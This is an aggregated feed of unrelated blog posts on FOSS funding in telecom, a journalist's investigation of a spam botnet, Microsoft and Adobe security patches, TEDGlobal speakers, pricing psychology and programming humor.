We're making some progress in securing funding from players we cannot name [4] during recent years. We're also making occasional progress in convincing BTS suppliers to chip in their share. Unfortunately there are more who don't live up to their responsibility than those who do. I might start calling them out by name one day. The wider community and the public actually deserves to know who plays by FOSS rules and who doesn't. That's not shaming, it's just stating bare facts.

Which brings us to:

  • sysmocom is in an office that's actually too small for the team, equipment and stock. But we certainly cannot afford more space.
  • we cannot pay our employees what they could earn working at similar positions in other companies. So working at sysmocom requires dedication to the cause :)
  • Holger and I have invested way more time than we have ever paid us, even more so considering the opportunity cost of what we would have earned if we'd continued our freelance Open Source hacker path
  • we're [just barely] managing to pay for 6 developers dedicated to Osmocom development on our payroll based on the various funding sources indicated above

Nevertheless, I doubt that any such a small team has ever implemented an end-to-end GSM/GPRS/EGPRS network from RAN to Core at comparative feature set. My deepest respects to everyone involved. The big task now is to make it sustainable.

Summary

So as you can see, there's quite a bit of funding around. However, it always falls short of what's needed to implement all parts properly, and even not quite sufficient to keep maintaining the status quo in a proper and tested way. That can often be frustrating (mostly to us but sometimes also to users who run into regressions and oter bugs). There's so much more potential. So many things we wanted to add or clean up for a long time, but too little people interested in joining in, helping out - financially or by writing code.

On thing that is often a challenge when dealing with traditional customers: We are not developing a product and then selling a ready-made product. In fact, in FOSS this would be more or less suicidal: We'd have to invest man-years upfront, but then once it is finished, everyone can use it without having to partake in that investment.

So instead, the FOSS model requires the customers/users to chip in early during the R&D phase, in order to then subsequently harvest the fruits of that.

I think the lack of a FOSS mindset across the cellular / telecom industry is the biggest constraining factor here. I've seen that some 20-15 years ago in the Linux world. Trust me, it takes a lot of dedication to the cause to endure this lack of comprehension so many years later.

[1]just like Linux has started out.
[2]while you will not find a lot of commits from Dieter in the code, he has been playing a key role in doing a lot of prototyping, reverse engineering and debugging!
[3]sysmocom is 100% privately held by Holger and me, we intentionally have no external investors and are proud to never had to take a bank loan. So all we could invest was our own money and, most of all, time.
[4]contrary to the FOSS world, a lot of aspects are confidential in business, and we're not at liberty to disclose the identities of all our customers

Harald WelteFOSS misconceptions, still in 2017

The lack of basic FOSS understanding in Telecom

Given that the Free and Open Source movement has been around at least since the 1980ies, it puzzles me that people still seem to have such fundamental misconceptions about it.

Something that really triggered me was an article at LightReading [1] which quotes Ulf Ewaldsson, a leading Ericsson excecutive with

"I have yet to understand why we would open source something we think is really good software"

This completely misses the point. FOSS is not about making a charity donation of a finished product to the planet.

FOSS is about sharing the development costs among multiple players, and avoiding that everyone has to reimplement the wheel. Macro-Economically, it is complete and utter nonsense that each 3GPP specification gets implemented two dozens of times, by at least a dozen of different entities. As a result, products are way more expensive than needed.

If large Telco players (whether operators or equipment manufacturers) were to collaboratively develop code just as much as they collaboratively develop the protocol specifications, there would be no need for replicating all of this work.

As a result, everyone could produce cellular network elements at reduced cost, sharing the R&D expenses, and competing in key areas, such as who can come up with the most energy-efficient implementation, or can produce the most reliable hardware, the best receiver sensitivity, the best and most fair scheduling implementation, or whatever else. But some 80% of the code could probably be shared, as e.g. encoding and decoding messages according to a given publicly released 3GPP specification document is not where those equipment suppliers actually compete.

So my dear cellular operator executives: Next time you're cursing about the prohibitively expensive pricing that your equipment suppliers quote you: You only have to pay that much because everyone is reimplementing the wheel over and over again.

Equally, my dear cellular infrastructure suppliers: You are all dying one by one, as it's hard to develop everything from scratch. Over the years, many of you have died. One wonders, if we might still have more players left, if some of you had started to cooperate in developing FOSS at least in those areas where you're not competing. You could replicate what Linux is doing in the operating system market. There's no need in having a phalanx of different proprietary flavors of Unix-like OSs. It's way too expansive, and it's not an area in which most companies need to or want to compete anyway.

Management Summary

You don't first develop and entire product until it is finished and then release it as open source. This makes little economic sense in a lot of cases, as you've already invested into developing 100% of it. Instead, you actually develop a new product collaboratively as FOSS in order to not have to invest 100% but maybe only 30% or even less. You get a multitude of your R&D investment back, because you're not only getting your own code, but all the other code that other community members implemented. You of course also get other benefits, such as peer review of the code, more ideas (not all bright people work inside one given company), etc.

[1]that article is actually a heavily opinionated post by somebody who appears to be pushing his own anti-FOSS agenda for some time. The author is misinformed about the fact that the TIP has always included projects under both FRAND and FOSS terms. As a TIP member I can attest to that fact. I'm only referencing it here for the purpose of that that Ericsson quote.

Krebs on SecurityInside a Porn-Pimping Spam Botnet

For several months I’ve been poking at a decent-sized spam botnet that appears to be used mainly for promoting adult dating sites. Having hit a wall in my research, I decided it might be good to publish what I’ve unearthed so far to see if this dovetails with any other research out there.

In late October 2016, an anonymous source shared with KrebsOnSecurity.com a list of nearly 100 URLs that — when loaded into a Firefox browser — each displayed what appeared to be a crude but otherwise effective text-based panel designed to report in real time how many “bots” were reporting in for duty.

Here’s a set of archived screenshots of those counters illustrating how these various botnet controllers keep a running tab of how many “activebots” — hacked servers set up to relay spam — are sitting idly by and waiting for instructions.

One of the more than 100 panels linked to the same porn spamming operation. In October 2016, these 100 panels reported a total of 1.2 million active bots operating simultaneously.

At the time, it was unclear to me how this apparent botnet was being used, and since then the total number of bots reporting in each day has shrunk considerably. During the week the above-linked screen shots were taken, this botnet had more than 1.2 million zombie machines or servers reporting each day (that screen shot archive includes roughly half of the panels found). These days, the total number of servers reporting in to this spam network fluctuates between 50,000 and 100,000.

Thanks to a tip from an anti-spam activist who asked not to be named, I was able to see that the botnet appears to be busy promoting a seemingly endless network of adult dating Web sites connected to just two companies: CyberErotica, and Deniro Marketing LLC (a.k.a. AmateurMatch).

As affiliate marketing programs go, CyberErotica stretches way back — perhaps to the beginning. According to TechCrunch, CyberErotica is said to have launched the first online affiliate marketing firm in 1994.

In 2001, CyberErotica’s parent firm Voice Media settled a lawsuit with the U.S. Federal Trade Commission, which alleged that the adult affiliate program was misrepresenting its service as free while it dinged subscribers for monthly charges and made it difficult for them to cancel.

In 2010, Deniro Marketing found itself the subject of a class-action lawsuit that alleged the company employed spammers to promote an online dating service that was overrun with automated, fake profiles of young women. Those allegations ended in an undisclosed settlement after the judge in the case tossed out the spamming claim because the statute of limitations on those charges had expired.

What’s unusual (and somewhat lame) about this botnet is that — through a variety of botnet reporting panels that are still displaying data — we can get live, real-time updates about the size and status of this crime machine. No authentication or credentials needed. So much for operational security!

The “mind map” pictured below contains enough information for nearly anyone to duplicate this research, and includes the full Web address of the botnet reporting panels that are currently online and responding with live updates. I was unable to load these panels in a Google Chrome browser (perhaps the XML data on the page is missing some key components), but they loaded fine in Mozilla Firefox.

But a note of caution: I’d strongly encourage anyone interested in following my research to take care before visiting these panels, preferably doing so from a disposable “virtual” machine that runs something other than Microsoft Windows.

That’s because spammers are usually involved in the distribution of malicious software, and spammers who maintain vast networks of apparently compromised systems are almost always involved in creating or at least commissioning the creation of said malware. Worse, porn spammers are some of the lowest of the low, so it’s only prudent to behave as if any and all of their online assets are actively hostile or malicious.

A “mind map” tracing some of the research mentioned in this post.

FOLLOW THE HONEY

So how did KrebsOnSecurity tie the spam that was sent to promote these two adult dating schemes to the network of spam botnet panels that I mentioned at the outset of this post? I should say it helped immensely that one anti-spam source maintains a comprehensive, historic collection of spam samples, and that this source shared more than a half dozen related spam samples. Here’s one of them.

All of those spams had similar information included in their “headers” — the metadata that accompanies all email messages.

Received: from minitanth.info-88.top (037008194168.suwalki.vectranet.pl [37.8.194.168])
Received: from exundancyc.megabulkmessage225.com (109241011223.slupsk.vectranet.pl [109.241.11.223])
Received: from disfrockinga.message-49.top (unknown [78.88.215.251])
Received: from offenders.megabulkmessage223.com (088156021226.olsztyn.vectranet.pl [88.156.21.226])
Received: from snaileaterl.inboxmsg-228.top (109241018033.lask.vectranet.pl [109.241.18.33])
Received: from soapberryl.inboxmsg-242.top (037008209142.suwalki.vectranet.pl [37.8.209.142])
Received: from dicrostonyxc.inboxmsg-230.top (088156042129.olsztyn.vectranet.pl [88.156.42.129])

To learn more about what information you can glean from email headers, see this post. But for now, here’s a crash course for our purposes. The so-called “fully qualified domain names” or FQDNs in the list above can be found just to the right of the open parentheses in each line.

When this information is present in the headers (and not simply listed as “unknown”) it is the fully-verified, real name of the machine that sent the message (at least as far as the domain name system is concerned). The dotted address to the right in brackets on each line is the numeric Internet address of the actual machine that sent the message.

The information to the left of the open parentheses is called the “HELO/EHLO string,” and an email server administrator can set this information to display whatever he wants: It could be set to bush[dot]whitehouse[dot]gov. Happily, in this case the spammer seems to have been consistent in the naming convention used to identify the sending domains and subdomains.

Back in October 2016 (when these spam messages were sent) the FQDN “minitanth.info-88[dot]top” resolved to a specific IP address: 37.8.194.168. Using passive DNS tools from Farsight Security — which keeps a historic record of which domain names map to which IP addresses — I was able to find that the spammer who set up the domain info-88[dot]top had associated the domain with hundreds of third-level subdomains (e.g. minithanth.info-88[dot]top, achoretsq.info-88[dot]top, etc.).

It was also clear that this spammer controlled a great many top-level domain names, and that he had countless third-level subdomains assigned to every domain name. This type of spamming is known as “snowshoe” spamming.

Like a snowshoe spreads the load of a traveler across a wide area of snow, snowshoe spamming is a technique used by spammers to spread spam output across many IPs and domains, in order to dilute reputation metrics and evade filters,” writes anti-spam group Spamhaus in its useful spam glossary.

WORKING BACKWARDS

So, armed with all of that information, it took just one or two short steps to locate the IP addresses of the corresponding botnet reporting panels. Quite simply, one does DNS lookups to find the names of the name servers that were providing DNS service for each of this spammer’s second-level domains.

Once one has all of the name server names, one simply does yet more DNS lookups — one for each of the name server names — in order to get the corresponding IP address for each one.

With that list of IP addresses in hand, a trusted source volunteered to perform a series of scans on the addresses using “Nmap,” a powerful and free tool that can map out any individual virtual doorways or “ports” that are open on targeted systems. In this case, an Nmap scan against that list of IPs showed they were all listening for incoming connections on Port 10001.

From there, I took the IP address list and plugged each address individually into the URL field of a browser window in Mozilla Firefox, and then added “:10001” to the end of the address. After that, each address happily loaded a Web page displaying the number of bots connecting to each IP address at any given time.

Here’s the output of one controller that’s currently getting pinged by more than 12,000 systems configured to relay porn spam (the relevant part is the first bit on the second line below — “current activebots=”). Currently, the entire botnet (counting the active bots from all working bot panels) seems to hover around 80,000 systems.

pornbotpanel

At the time, the spam being relayed through these systems was advertising sites that tried to get visitors to sign up for online chat and dating sites apparently affiliated with Deniro Marketing and CyberErotica.

Seeking more information, I began searching the Web for information about CyberErotica’s affiliate offerings and I found that the affiliate program’s marketing division is run by a guy who uses the email address scott@cecash.com.

A Google search quickly reveals that scott@cecash.com also advertises he can be reached using the ICQ instant messenger address of 55687349. I checked icq.com’s member lookup page, and found the name attached to ICQ# 55687349 is “Scott Philips.”

Mr. Philips didn’t return messages seeking comment. But I couldn’t help wonder about the similarity between that name and a convicted Australian porn spammer named Scott Phillips (NB: two “l’s in Phillips).

In 2010, Scott Gregory Phillips was fined AUD $2 million for running a business that employed people to create fake profiles on dating websites in a bid to obtain the mobile phone numbers of dating website users. Phillips’ operation then sent SMS texts such as “get laid, text your number to…”, and then charged $5 on the mobile accounts of people who replied.

Phillips’ Facebook page and Quora profile would have us believe he has turned his life around and is now making a living through day trading. Reached via email, Phillips said he is a loyal reader who long ago quit the spam business.

“I haven’t been in the spam business since 2002 or so,” Phillips said. “I did some SMS spam in 2005, got about 18 million bucks worth of fines for it, and went straight.”

Phillips says he builds “automated commodity trading systems” now, and that virtually all modern spam is botnet-based.

“As far as I know the spam industry is 100% botnet these days, and not a viable proposition for adult sites,” he told KrebsOnSecurity.

Well, it’s certainly a viable proposition for some spammer. The most frustrating aspect of this research is that — in spite of the virtually non-existent operational security employed by whoever built this particular crime machine, I still have no real data on how the botnet is being built, what type of malicious software may be involved, or who’s responsible.

If anyone has additional research or information on this botnet, please don’t hesitate to leave a comment below or get in touch with me directly.

Cory DoctorowTalking about contestable futures on the Imaginary Worlds podcast

I’m in the latest episode of Imaginary Worlds, “Imagining the Internet” (MP3), talking about the future as a contestable place that we can’t predict, but that we can influence.


We were promised flying cars and we got Twitter instead. That’s the common complaint against sci-fi authors. But some writers did imagine the telecommunications that changed our world for better or worse. Cory Doctorow, Ada Palmer, Jo Walton and Arizona State University professor Ed Finn look at the cyberpunks and their predecessors. And artist Paul St George talks about why he’s fascinated by a Skype-like machine from the Victorian era.

CryptogramMillennials and Secret Leaking

I hesitate to blog this, because it's an example of everything that's wrong with pop psychology. Malcolm Harris writes about millennials, and has a theory of why millennials leak secrets. My guess is that you could write a similar essay about every named generation, every age group, and so on.

Worse Than FailureCodeSOD: Classic WTF: Hacker Proof Booleans

We continue our summer break with a classic case of outsmarting oneself in the stupidest way. Original -- Remy

"Years ago, long before I'd actually started programming, I spent my time learning about computers and data concepts by messing around with, believe it or not, cheat devices for video games," wrote Rena K., "The one I used primarily provided a RAM editor and some other tools which allowed me to tool around with the internal game files and I even get into muddling around with the game data all in the interest of seeing what would happen."

"As such, by the time my inflated hacker ego and I got into programming professionally, I was already pretty familiar with basic things like data types and binary. I was feeling pretty darn L33T."

"However, this mindset lead to me thinking that someone could potentially 'steal my program' by replacing my name with theirs in a hex editor and claiming to have made it themselves. (Which wasn't unheard of in the little game hacking communities I was in...) So I used the h4x0r sk1llz I'd picked up to make my program hacker-proof."

"Of course I knew full well how boolean variables worked, but I'd read somewhere that in VB6, boolean types were actually integers. From this, I concluded that it was technically possible that a boolean variable could hold a value that was neither true or false. Of course there was no way to do this from within VB, so that could only mean someone was monkeying around with something they shouldn't. I needed a way to detect this."

if var = true then
    doThings()
else if var = false then
    doOtherThings()
else
    MsgBox("omfg haxor alert")
    End --terminate program
end if

"I kept up adding the above to my code for years until I grew up enough to realize that it didn't do a darn thing. For the record though, nobody ever managed to 'steal my program'."


Do you have any confessions you'd like to make? Send them on in.

[Advertisement] Infrastructure as Code built from the start with first-class Windows functionality and an intuitive, visual user interface. Download Otter today!

,

CryptogramData vs. Analysis in Counterterrorism

This article argues that Britain's counterterrorism problem isn't lack of data, it's lack of analysis.

Cory DoctorowHow to get a signed, personalized copy of Walkaway sent to your door!


The main body of the tour for my novel Walkaway is done (though there are still upcoming stops at Denver Comic-Con, San Diego Comic-Con, the Burbank Public Library and Defcon in Las Vegas), but you can still get signed, personalized copies of Walkaway!

My local, fantastic indie bookstore, Dark Delicacies, has a good supply of Walkaways, and since I pass by it most days, they’ve generously offered to take special orders for me to stop in and personalize so they can ship them anywhere in the world.

You can reach them at +1 818-556-6660, or darkdel@darkdel.com.

Sociological Images“Luxury” versus “discount” pricing and the meaning of the number 9

I discovered a nice gem of an insight this week in an article called The 11 Ways That Consumers Are Hopeless at Math: the symbolism of the number 9.

We’re all familiar with the convention of pricing items one penny below a round number: $1.99 instead of $2.00, $39.99 instead of $40.00, etc. Psychologically, marketers know that this works. We’re more likely to buy something at $89.99 than we are at $90.00.

It’s not, though, because we are tricked by that extra penny for our pockets. It’s because, so argues Derek Thompson, the .99 symbolizes “discount.” It is more than just a number, it has a meaning. It now says to us not just 9, but also You are getting a deal. It doesn’t matter if it’s a carton of eggs for $2.99 or a dishwasher for $299.99. In both cases, putting two 9s at the end makes us feel like smart shoppers.

To bring this point home, in those moments when we’re not looking for a deal, the number 9 has the opposite effect. When marketers want to sell a “luxury” item, they generally don’t use the 9s. They simply state the round number price. The whole point of buying a luxury item is to spend a lot of money because you have the money to spend. It shouldn’t feel like a deal; it should feel like an indulgence. Thompson uses the example of lobster at a high-end restaurant. They don’t sell it to you for $99.99. That looks cheap. They ask you for the $100. And, if you’ve got the money and you’re in the mood, it feels good exactly in part because there are no 9s.

Definitely no 9s:

Photo by artjour street art flickr creative commons.

Not yet convinced? Consider as an example this price tag for a flat screen television. Originally priced at $2,300.00, but discounted at $1,999.99. Suddenly on sale and a whole lot of 9s:

Photo by Paul Swansen flickr creative commons; cropped.
Lisa Wade, PhD is a professor at Occidental College. She is the author of American Hookup, a book about college sexual culture, and a textbook about gender. You can follow her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Worse Than FailureClassic WTF: The Accidental Hire

At least we get a summer break, I suppose. Not like over at Doghouse Insurance. Original -- Remy

Doghouse Insurance (as we'll call them) was not a pleasant place to work. Despite being a very successful player in their industry, the atmosphere inside Doghouse was filled with a constant, frenzied panic. If Joe Developer didn't delay his upcoming vacation and put in those weekend hours, he might risk the timely delivery of his team's module, which might risk delaying the entire project, which might risk the company's earnings potential, which might risk the collapse of the global economy. And that's just for the Employee Password Change Webpage project; I can't even begin to fathom the overarching devastation that would ensue from a delayed critical project.

To make matters worse, the primary business application that poor souls like Vinny maintained was a complete nightmare. It was developed during the company's "database simplification" era and consisted of hundreds of different "virtual attribute tables" stuffed into four real tables; it was a classic case of The Inner-Platform Effect. But amidst all this gloom and despair was an upbeat fellow named Chris who accidentally became a part of the Doghouse Insurance team.

Chris interviewed with Doghouse Insurance back in 2002 for a developer position on the Data Warehouse team. With the large pool of available candidates at the time, Chris didn't make the cut and the opening was awarded to someone else. However, Doghouse never communicated this to him and instead offered him a job.

It was an awkward first day; Chris showed up and no one knew what to do with him. They obviously couldn't immediately fire him (it would risk a lawsuit, which might risk a -- oh, you know the drill) and, since all teams were short-staffed, they couldn't increase the headcount on one team because that would be unfair to all of the other managers. After a few weeks, it was finally decided: Chris would be the Source Control Guy.

Doghouse Insurance didn't really have a need for a Source Control Guy and Chris didn't really have any experience being a Source Control Guy. It was a perfect match. After a few months, Chris figured out how to manage Doghouse's Source Control System and became responsible for the entirety of SCS-related tasks: adding new users, reseting forgotten passwords, creating new repositories, and -- well -- that was pretty much it.

While everyone else stressed out and practically killed themselves over deadlines, Chris mostly sat around all day, waiting for that occasional "I forgot my source control password" email. He never gloated nor complained and instead made himself available to listen to his coworker's grievances and tales of woe. Chris would offer up whatever advice he could and would generally lighten the mood of anyone who stopped by his desk for a chat. His cubicle became the sole oasis of sanity in the frantic world of Doghouse Insurance.

Although Vinny is no longer at Doghouse Insurance (he actually left after following Chris' advice), he still does keep in touch with Chris. And Vinny is happy to report that, should you ever find yourself unfortunate enough to work at Doghouse Insurance, you can still find Chris there, managing the Source Control System and eager to chat about the insanity that is Doghouse.

[Advertisement] Scale your release pipelines, creating secure, reliable, reusable deployments with one click. Download and learn more today!

,

Krebs on SecurityMicrosoft, Adobe Ship Critical Fixes

Microsoft today released security updates to fix almost a hundred flaws in its various Windows operating systems and related software. One bug is so serious that Microsoft is issuing patches for it on Windows XP and other operating systems the company no longer officially supports. Separately, Adobe has pushed critical updates for its Flash and Shockwave players, two programs most users would probably be better off without.

brokenwindowsAccording to security firm Qualys, 27 of the 94 security holes Microsoft patches with today’s release can be exploited remotely by malware or miscreants to seize complete control over vulnerable systems with little or no interaction on the part of the user.

Microsoft this month is fixing another serious flaw (CVE-2017-8543) present in most versions of Windows that resides in the feature of the operating system which handles file and printer sharing (also known as “Server Message Block” or the SMB service).

SMB vulnerabilities can be extremely dangerous if left unpatched on a local (internal) corporate network. That’s because a single piece of malware that exploits this SMB flaw within a network could be used to replicate itself to all vulnerable systems very quickly.

It is this very “wormlike” capability — a flaw in Microsoft’s SMB service — that was harnessed for spreading by WannaCry, the global ransomware contagion last month that held files for ransom at countless organizations and shut down at least 16 hospitals in the United Kingdom.

According to Microsoft, this newer SMB flaw is already being exploited in the wild. The vulnerability affects Windows Server 2016, 2012, 2008 as well as desktop systems like Windows 10, 7 and 8.1.

The SMB flaw — like the one that WannaCry leveraged — also affects older, unsupported versions of Windows such as Windows XP and Windows Server 2003. And, as with that SMB flaw, Microsoft has made the unusual decision to make fixes for this newer SMB bug available for those older versions. Users running XP or Server 2003 can get the update for this flaw here.

“Our decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,” wrote Eric Doerr, general manager of Microsoft’s Security Response Center.

“Based on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly,” Doerr wrote. “As always, we recommend customers upgrade to the latest platforms. “The best protection is to be on a modern, up-to-date system that incorporates the latest defense-in-depth innovations. Older systems, even if fully up-to-date, lack the latest security features and advancements.”

The default browsers on Windows — Internet Explorer or Edge — get their usual slew of updates this month for many of these critical, remotely exploitable bugs. Qualys says organizations using Microsoft Outlook should pay special attention to a newly patched bug in the popular mail program because attackers can send malicious email and take complete control over the recipient’s Windows machine when users merely view a specially crafted email in Outlook.

brokenflash-aSeparately, Adobe has issued updates to fix critical security problems with both its Flash Player and Shockwave Player. If you have Shockwave installed, please consider removing it now.

For starters, hardly any sites require this plugin to view content. More importantly, Adobe has a history of patching Shockwave’s built-in version of Flash several versions behind the stand-alone Flash plugin version. As a result Shockwave has been a high security risk to have installed for many years now. For more on this trend, see Why You Should Ditch Adobe Shockwave.

Same goes for Adobe Flash Player, which probably most users can get by with these days just enabling it in the rare instance that it’s required. I recommend for users who have an affirmative need for Flash to leave it disabled until that need arises. Otherwise, get rid of it.

Adobe patches dangerous new Flash flaws all the time, and Flash bugs are still the most frequently exploited by exploit kits — malware booby traps that get stitched into the fabric of hacked and malicious Web sites so that visiting browsers running vulnerable versions of Flash get automatically seeded with malware.

For some ideas about how to hobble or do without Flash (as well as slightly less radical solutions) check out A Month Without Adobe Flash Player.

If you choose to keep Flash, please update it today to version 26.0.0.126. The most recent versions of Flash should be available from the Flash home page. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

Chrome and IE should auto-install the latest Flash version on browser restart (users may need to manually check for updates in and/or restart the browser to get the latest Flash version). Chrome users may need to restart the browser to install or automatically download the latest version. When in doubt, click the vertical three dot icon to the right of the URL bar, select “Help,” then “About Chrome”: If there is an update available, Chrome should install it then.

As always, if you experience any issues downloading or installing any of these updates, please leave a note about it in the comments below.

Update, May 16, 10:38 a.m. ET: Microsoft has revised its bulletin on the vulnerability for which it issued Windows XP fixes (CVE-2017-8543) to clarify that the problem fixed by the patch is in the Windows Search service, not the SMB service as Microsoft previously stated in the bulletin. The original bulletin from Microsoft’s Security Response Center incorrectly stated that SMB was part of this vulnerability: rather, it has nothing to do with this vulnerability and was not patched. The vulnerability is in Windows Search only. I’m mentioning it here because a Windows user or admin thinking that turning off SMBor blocking SMB would stop all vectors to this attack would be wrong and still vulnerable without the patch. All an attacker needs to is get some code to talk to Windows Search in a malformed way – even locally — to exploit this Windows Search flaw.

TEDSneak preview lineup unveiled for Africa’s next TED Conference

On August 27, an extraordinary group of people will gather in Arusha, Tanzania, for TEDGlobal 2017, a four-day TED Conference for “those with a genuine interest in the betterment of the continent,” says curator Emeka Okafor.

As Okafor puts it: “Africa has an opportunity to reframe the future of work, cultural production, entrepreneurship, agribusiness. We are witnessing the emergence of new educational and civic models. But there is, on the flip side, a set of looming challenges that include the youth bulge and under-/unemployment, a food crisis, a risky dependency on commodities, slow industrializations, fledgling and fragile political systems. There is a need for a greater sense of urgency.”

He hopes the speakers at TEDGlobal will catalyze discussion around “the need to recognize and amplify solutions from within the Africa and the global diaspora.”

Who are these TED speakers? A group of people with “fresh, unique perspectives in their initiatives, pronouncements and work,” Okafor says. “Doers as well as thinkers — and contrarians in some cases.” The curation team, which includes TED head curator Chris Anderson, went looking for speakers who take “a hands-on approach to solution implementation, with global-level thinking.”

Here’s the first sneak preview — a shortlist of speakers who, taken together, give a sense of the breadth and topics to expect, from tech to the arts to committed activism and leadership. Look for the long list of 35–40 speakers in upcoming weeks.

The TEDGlobal 2017 conference happens August 27–30, 2017, in Arusha, Tanzania. Apply to attend >>

Kamau Gachigi, Maker

“In five to ten years, Kenya will truly have a national innovation system, i.e. a system that by its design audits its population for talented makers and engineers and ensures that their skills become a boon to the economy and society.” — Kamau Gachigi on Engineering for Change

Dr. Kamau Gachigi is the executive director of Gearbox, Kenya’s first open makerspace for rapid prototyping, based in Nairobi. Before establishing Gearbox, Gachigi headed the University of Nairobi’s Science and Technology Park, where he founded a Fab Lab full of manufacturing and prototyping tools in 2009, then built another one at the Riruta Satellite in an impoverished neighborhood in the city. At Gearbox, he empowers Kenya’s next generation of creators to build their visions. @kamaufablab

Mohammed Dewji, Business leader

“My vision is to facilitate the development of a poverty-free Tanzania. A future where the opportunities for Tanzanians are limitless.” — Mohammed Dewji

Mohammed Dewji is a Tanzanian businessman, entrepreneur, philanthropist, and former politician. He serves as the President and CEO of MeTL Group, a Tanzanian conglomerate operating in 11 African countries. The Group operates in areas as diverse as trading, agriculture, manufacturing, energy and petroleum, financial services, mobile telephony, infrastructure and real estate, transport, logistics and distribution. He served as Member of Parliament for Singida-Urban from 2005 until his retirement in 2015. Dewji is also the Founder and Trustee of the Mo Dewji Foundation, focused on health, education and community development across Tanzania. @moodewji

Meron Estefanos, Refugee activist

“Q: What’s a project you would like to move forward at TEDGlobal?
A: Bringing change to Eritrea.” —Meron Estefanos

Meron Estefanos is an Eritrean human rights activist, and the host and presenter of Radio Erena’s weekly program “Voices of Eritrean Refugees,” aired from Paris. Estefanos is executive director of the Eritrean Initiative on Refugee Rights (EIRR), advocating for the rights of Eritrean refugees, victims of trafficking, and victims of torture. Ms Estefanos has been key in identifying victims throughout the world who have been blackmailed to pay ransom for kidnapped family members, and was a key witness in the first trial in Europe to target such blackmailers. She is co-author of Human Trafficking in the Sinai: Refugees between Life and Death and The Human Trafficking Cycle: Sinai and Beyond, and was featured in the film Sound of Torture. She was nominated for the 2014 Raoul Wallenberg Award for her work on human rights and victims of trafficking. @meronina

Touria El Glaoui, Art fair founder

“I’m looking forward to discussing the roles we play as leaders and tributaries in redressing disparities within arts ecosystems. The art fair is one model which has had a direct effect on the ways in which audiences engage with art, and its global outlook has contributed to a highly mobile and dynamic means of interaction.” — Touria El Glaoui

Touria El Glaoui is the founding director of the 1:54 Contemporary African Art Fair, which takes place in London and New York every year and, in 2018, launches in Marrakech. The fair highlights work from artists and galleries across Africa and the diaspora, bringing visibility in global art markets to vital upcoming visions. El Glaoui began her career in the banking industry before founding 1:54 in 2013. Parallel to her career, Touria has organised and co-curated exhibitions of her father’s work, the Moroccan artist Hassan El Glaoui, in London and Morocco. @154artfair

Gus Casely-Hayford, Historian

“Technological, demographic, economic and environmental change are recasting the world profoundly and rapidly. The sentiment that we are traveling through unprecedented times has left many feeling deeply unsettled, but there may well be lessons to learn from history — particularly African history — lessons that show how brilliant leadership and strategic intervention have galvanised and united peoples around inspirational ideas.” — Gus Casely-Hayford

Dr. Gus Casely-Hayford is a curator and cultural historian who writes, lectures and broadcasts widely on African culture. He has presented two series of The Lost Kingdoms of Africa for the BBC and has lectured widely on African art and culture, advising national and international bodies on heritage and culture. He is currently developing a National Portrait Gallery exhibition that will tell the story of abolition of slavery through 18th- and 19th-century portraits — an opportunity to bring many of the most important paintings of black figures together in Britain for the first time.

Oshiorenoya Agabi, Computational neuroscientist

“Koniku eventually aims to build a device that is capable of thinking in the biological sense, like a human being. We think we can do this in the next two to five years.” — Oshiorenoya Agabi on IndieBio.co

With his startup Koniku, Oshiorenoya Agabi is working to integrate biological neurons and silicon computer chips, to build computers that can think like humans can. Faster, cleverer computer chips are key to solving the next big batch of computing problems, like particle detection or sophisticated climate modeling — and to get there, we need to move beyond the limitations of silicon, Agabi believes. Born and raised in Lagos, Nigeria, Agabi is now based in the SF Bay Area, where he and his lab mates are working on the puzzle of connecting silicon to biological systems.

Natsai Audrey Chieza, Design researcher

Photo: Natsai Audrey Chieza

Natsai Audrey Chieza is a design researcher whose fascinating work crosses boundaries between technology, biology, design and cultural studies. She is founder and creative director of Faber Futures, a creative R&D studio that conceptualises, prototypes and evaluates the resilience of biomaterials emerging through the convergence of bio-fabrication, digital fabrication and traditional craft processes. As Resident Designer at the Department of Biochemical Engineering, University College London, she established a design-led microbiology protocol that replaces synthetic pigments with natural dyes excreted by bacteria — producing silk scarves dyed brilliant blues, reds and pinks. The process demands a rethink of the entire system of fashion and textile production — and is also a way to examine issues like resource scarcity, provenance and cultural specificity. @natsaiaudrey

Stay tuned for more amazing speakers, including leaders, creators, and more than a few truth-tellers … learn more >>


CryptogramSecurity Flaws in 4G VoLTE

Research paper: "Subscribers remote geolocation and tracking using 4G VoLTE enabled Android phone," by Patrick Ventuzelo, Olivier Le Moal, and Thomas Coudray.

Abstract: VoLTE (Voice over LTE) is a technology implemented by many operators over the world. Unlike previous 2G/3G technologies, VoLTE offers the possibility to use the end-to-end IP networks to handle voice communications. This technology uses VoIP (Voice over IP) standards over IMS (IP Multimedia Subsystem) networks. In this paper, we will first introduce the basics of VoLTE technology. We will then demonstrate how to use an Android phone to communicate with VoLTE networks and what normal VoLTE communications look like. Finally, we will describe different issues and implementations' problems. We will present vulnerabilities, both passive and active, and attacks that can be done using VoLTE Android smartphones to attack subscribers and operators' infrastructures. Some of these vulnerabilities are new and not previously disclosed: they may allow an attacker to silently retrieve private pieces of information on targeted subscribers, such as their geolocation.

News article. Slashdot thread.

Worse Than FailureCodeSOD: Classic WTF: It's Like Calling Assert

We continue our summer vacation with this gem- a unique way to interact with structured exception handling, to be sure. Original. --Remy

When we go from language to language and platform to platform, a whole lot of “little things” change about how we write code: typing, syntax, error handling, etc. Good developers try to adapt to a new language by reading the documentation, asking experienced colleagues, and trying to follow best practices. “Certain Developers,” however, try to make the language adapt to their way of doing things.

Adrien Kunysz discovered this following code written by a “Certain Developer” who wasn’t a fan of the try...catch…finally approach called for in .NET Java development and exception handling.

   /**
    * Like calling assert(false) in C.
    */
   protected final void BUG (String msg) {
       Exception e = null;
       try { throw new Exception (); } catch (Exception c) { e = c; }
       logger.fatal (msg, e);
       System.exit (1);
   }

And I’m sure that, by commenting “Like calling assert(false) in C,” the author doesn’t mean assert.h, but means my_assert.h. After all, who is C – or any other language – to tell him how errors should be handled?

UPDATE: Fixed Typos and language. I swear, at 7:00AM this looked fine to me...

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

,

Sociological Images2/3rds of sexual minorities now identify as bisexual, but it depends

Originally posted at Inequality by (Interior) Design.

